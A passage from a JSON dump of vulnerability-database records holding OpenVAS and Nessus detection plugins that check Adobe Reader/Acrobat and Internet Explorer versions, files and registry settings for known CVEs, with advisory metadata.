X\nAdobe Acrobat XI Version 11.x prior to 11.0.02 on Mac OS X\";\n\ntag_insight = \"The flaws are due to unspecified errors.\";\n\ntag_solution = \"Upgrade to version 9.5.4 or X (10.1.6) or XI (11.0.02) or later,\nFor updates refer to http://www.adobe.com\";\n\ntag_summary = \"This host is installed with Adobe Acrobat and is prone to\nmultiple unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(803419);\n script_version(\"$Revision: 6115 $\");\n script_bugtraq_id(57931, 57947);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-12 11:03:25 +0200 (Fri, 12 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-19 19:32:21 +0530 (Tue, 19 Feb 2013)\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/52196\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_xref(name : \"URL\" , value : \"http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\", \"ssh_authorization_init.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nacrobatVer = \"\";\n\nacrobatVer = get_kb_item(\"Adobe/Acrobat/MacOSX/Version\");\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n # Check Adobe Acrobat version is 9.x <= 9.5.3, 10.x <= 10.1.5 and 11.x <= 11.0.01\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.3\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.5\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.01\")))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:04", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-02-19T00:00:00", "id": "OPENVAS:1361412562310803416", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803416", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_feb13_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803416\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_bugtraq_id(57931, 57947);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-19 18:24:49 +0530 (Tue, 19 Feb 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaws are due to unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code or cause\na denial of service via a crafted PDF document.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.4 on Mac OS X\nAdobe Reader X Version 10.x prior to 10.1.6 on Mac OS X\nAdobe Reader XI Version 11.x prior to 11.0.02 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.5.4, 10.1.6, 11.0.02 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52196\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.3\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.5\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.01\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Use-after-free vulnerability in CButton is actively used in-the-wild.", "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": "SECURITYVULNS:VULN:12835", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12835", "title": "Microsoft Internet Explorer use-after-free vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Buffer oveflows are exploited in-the-wild.", "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:VULN:12924", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12924", "title": "Adobe Reader / Acrobat security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-02-01T02:11:42", "bulletinFamily": "scanner", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "modified": "2020-02-02T00:00:00", "id": "SMB_NT_MS13-008.NASL", "href": "https://www.tenable.com/plugins/nessus/63522", "published": "2013-01-14T00:00:00", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-29T13:40:33", "bulletinFamily": "scanner", "description": "The remote host is missing the workaround referenced in KB 2757760 (Microsoft 'Fix it' 50939). This workaround mitigates a use-after-free vulnerability in Internet Explorer. Without this workaround enabled, an attacker could exploit this vulnerability by tricking a user into view a maliciously crafted web page, resulting in arbitrary code execution. This vulnerability is being actively exploited in the wild.\n\nThis plugin has been deprecated due to the publication of MS12-063.\nMicrosoft has released patches that make the workarounds unnecessary. To check for the patches, use Nessus plugin ID 62223.", "modified": "2017-08-30T00:00:00", "published": "2012-09-19T00:00:00", "id": "SMB_KB2757760.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62201", "type": "nessus", "title": "MS KB2757760: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)", "sourceData": "# @DEPRECATED@\n#\n# Disabled on 2012/09/21. Deprecated by smb_nt_ms12-063.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62201);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:46 $\");\n\n script_cve_id(\"CVE-2012-4969\");\n script_bugtraq_id(55562);\n script_osvdb_id(85532);\n script_xref(name:\"CERT\", value:\"480095\");\n script_xref(name:\"MSKB\", value:\"2757760\");\n\n script_name(english:\"MS KB2757760: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)\");\n script_summary(english:\"Checks if 'Fix it' 50939 is in use.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing the workaround referenced in KB 2757760\n(Microsoft 'Fix it' 50939). This workaround mitigates a use-after-free\nvulnerability in Internet Explorer. Without this workaround enabled,\nan attacker could exploit this vulnerability by tricking a user into\nview a maliciously crafted web page, resulting in arbitrary code\nexecution. This vulnerability is being actively exploited in the\nwild.\n\nThis plugin has been deprecated due to the publication of MS12-063.\nMicrosoft has released patches that make the workarounds\nunnecessary. To check for the patches, use Nessus plugin ID 62223.\"\n );\n # http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bd827909\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2757760\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.microsoft.com/kb/2757760\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ProductName\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Use smb_nt_ms12-063.nasl (plugin ID 62223) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1)\n audit(AUDIT_WIN_SERVER_CORE);\n\nport = kb_smb_transport();\nvuln = 0;\n\nregistry_init();\nhandle = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nguid = '{777afb2a-98e5-4f14-b455-378a925cae15}';\npath = get_registry_value(handle:handle, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\n\nif (isnull(path))\n path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\nRegCloseKey(handle:handle);\nclose_registry(close:FALSE);\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n vuln = FALSE;\nelse\n vuln = TRUE;\n\nhotfix_check_fversion_end();\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus determined the workaround is not in use because the following' +\n '\\nfile was not found :\\n\\n' +\n path + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:42:37", "bulletinFamily": "scanner", "description": "The remote host is missing one of the workarounds referenced in KB 2887505.\n\nThe remote version of Internet Explorer (IE) reportedly has a memory corruption vulnerability related to how IE accesses an object in memory that has been deleted or has not been properly allocated. By exploiting this flaw, a remote, unauthenticated attacker could execute arbitrary code on the remote host subject to the privileges of the user running the affected application.", "modified": "2017-08-30T00:00:00", "published": "2013-09-17T00:00:00", "id": "SMB_KB2887505.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69931", "type": "nessus", "title": "MS KB2887505: Vulnerability in Internet Explorer Could Allow Remote Code Execution", "sourceData": "#@DEPRECATED@\n#\n# Disabled on 2013/10/08. Deprecated by smb_nt_ms13-080.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69931);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:47 $\");\n\n script_cve_id(\"CVE-2013-3893\");\n script_bugtraq_id(62453);\n script_osvdb_id(97380);\n script_xref(name:\"MSKB\", value:\"2887505\");\n\n script_name(english:\"MS KB2887505: Vulnerability in Internet Explorer Could Allow Remote Code Execution\");\n script_summary(english:\"Checks if workarounds referenced in KB article have been applied.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host is affected by a remote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing one of the workarounds referenced in KB\n2887505.\n\nThe remote version of Internet Explorer (IE) reportedly has a memory\ncorruption vulnerability related to how IE accesses an object in memory\nthat has been deleted or has not been properly allocated. By exploiting\nthis flaw, a remote, unauthenticated attacker could execute arbitrary\ncode on the remote host subject to the privileges of the user running\nthe affected application.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2887505\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the IE settings workarounds suggested by Microsoft in the\nadvisory, or apply the MSHTML Shim workaround in the Microsoft\n'Fix it' solution.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Internet Explorer SetMouseCapture Use-After-Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"microsoft_emet_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use plugin #70332 (smb_nt_ms13-080.nasl) instead.');\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nregistry_init();\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif(!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{55aab41f-5d5c-abdf-4568-baef76587bd7}';\npath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\nRegCloseKey(handle:hklm);\n\nif (isnull(path)) path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n{\n hotfix_check_fversion_end();\n exit(0, \"The host is not affected since the Microsoft 'Fix it' has been applied.\");\n}\n\n# hotfix_file_exists calls NetUseDel(close:FALSE), so we must reconnect\nregistry_init();\n\n\nemet_info = '';\n\nemet_installed = FALSE;\nemet_with_ie = FALSE;\n\nif (!isnull(get_kb_item(\"SMB/Microsoft/EMET/Installed\")))\n emet_installed = TRUE;\n\n# Check if EMET is configured with IE.\n# The workaround does not specifically ask to enable DEP\n# but if IE is configured with EMET, dep is enabled by default.\n\nemet_list = get_kb_list(\"SMB/Microsoft/EMET/*\");\nif (!isnull(emet_list))\n{\n foreach entry (keys(emet_list))\n {\n if (\"iexplore.exe\" >< entry && \"/dep\" >< entry)\n {\n dep = get_kb_item(entry);\n if (!isnull(dep) && dep == 1)\n emet_with_ie = TRUE;\n }\n }\n}\n\nif (!emet_installed)\n{\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is not' +\n '\\n installed.';\n}\nelse if (emet_installed)\n{\n if (!emet_with_ie)\n {\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is' +\n '\\n installed, however Internet Explorer is not configured with EMET.';\n }\n}\n\ninfo_user_settings = '';\n\n# check mitigation per user\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nsubkeys = get_registry_subkeys(handle:hku, key:'');\n\nforeach key (subkeys)\n{\n if ('.DEFAULT' >< key || 'Classes' >< key ||\n key =~ \"^S-1-5-\\d{2}$\") # skip built-in accounts\n continue;\n\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n if (isnull(value) && isnull(value1))\n continue;\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n# \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = 